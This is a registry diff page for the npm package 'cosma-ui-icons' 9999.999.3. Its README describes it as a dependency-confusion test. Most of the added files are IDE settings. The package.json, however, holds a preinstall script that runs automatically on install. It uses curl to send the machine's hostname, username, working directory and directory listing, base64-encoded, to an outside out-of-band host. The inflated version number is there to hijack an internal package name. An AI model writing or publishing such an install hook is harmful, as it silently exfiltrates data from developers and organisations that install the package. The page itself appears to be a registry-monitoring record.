cosma-ui-icons 9999.999.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of cosma-ui-icons might be problematic. Click here for more details.

@@ -0,0 +1,8 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <module type="WEB_MODULE" version="4">
3
+ <component name="NewModuleRootManager">
4
+ <content url="file://$MODULE_DIR$" />
5
+ <orderEntry type="inheritedJdk" />
6
+ <orderEntry type="sourceFolder" forTests="false" />
7
+ </component>
8
+ </module>
@@ -0,0 +1,17 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <project version="4">
3
+ <component name="ProjectTreeColorHighlighter">
4
+ <files />
5
+ <colors>
6
+ <color id="1" value="#4f060d" name="Color 1" enabled="true" />
7
+ <color id="2" value="#44220e" name="Color 2" enabled="true" />
8
+ <color id="3" value="#3f371b" name="Color 3" enabled="true" />
9
+ <color id="4" value="#162c16" name="Color 4" enabled="true" />
10
+ <color id="5" value="#0f2f47" name="Color 5" enabled="true" />
11
+ <color id="6" value="#171a34" name="Color 6" enabled="true" />
12
+ <color id="7" value="#311333" name="Color 7" enabled="true" />
13
+ <color id="8" value="#1e1e1e" name="Color 8" enabled="true" />
14
+ </colors>
15
+ <option name="marksForCollapsedHighlights" value="Dots" />
16
+ </component>
17
+ </project>
@@ -0,0 +1,8 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <project version="4">
3
+ <component name="ProjectModuleManager">
4
+ <modules>
5
+ <module fileurl="file://$PROJECT_DIR$/.idea/dependency-confusion.iml" filepath="$PROJECT_DIR$/.idea/dependency-confusion.iml" />
6
+ </modules>
7
+ </component>
8
+ </project>
@@ -0,0 +1,5 @@
1
+
2
+ <
3
+ package.json,7/0/7030d0b2f71b999ff89a343de08c414af32fc93a
4
+ 9
5
+ README.md,8/e/8ec9a00bfd09b3190ac6b22251dbb1aa95a0579d
package/.idea/vcs.xml ADDED
@@ -0,0 +1,6 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <project version="4">
3
+ <component name="VcsDirectoryMappings">
4
+ <mapping directory="$PROJECT_DIR$" vcs="Git" />
5
+ </component>
6
+ </project>
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # dependency-confusion
2
+
3
+ This is test package for dependency confusion vulnerability
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "cosma-ui-icons",
3
+ "version": "9999.999.3",
4
+ "description": "Dependency confusion test (NPM)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "curl -H \"Hostname: $(hostname | base64)\" -H \"Whoami: $(whoami | base64)\" -H \"Pwd: $(pwd | base64)\" -d $(ls -la | base64) https://bhgimgpnbksmciuybdoe9hfax1cczsv10.oast.fun/?name=DepConf"
8
+ },
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/orlserg/dependency-confusion.git"
12
+ },
13
+ "author": "orlserg",
14
+ "license": "ISC",
15
+ "bugs": {
16
+ "url": "https://github.com/orlserg/dependency-confusion/issues"
17
+ },
18
+ "homepage": "https://github.com/orlserg/dependency-confusion#readme"
19
+ }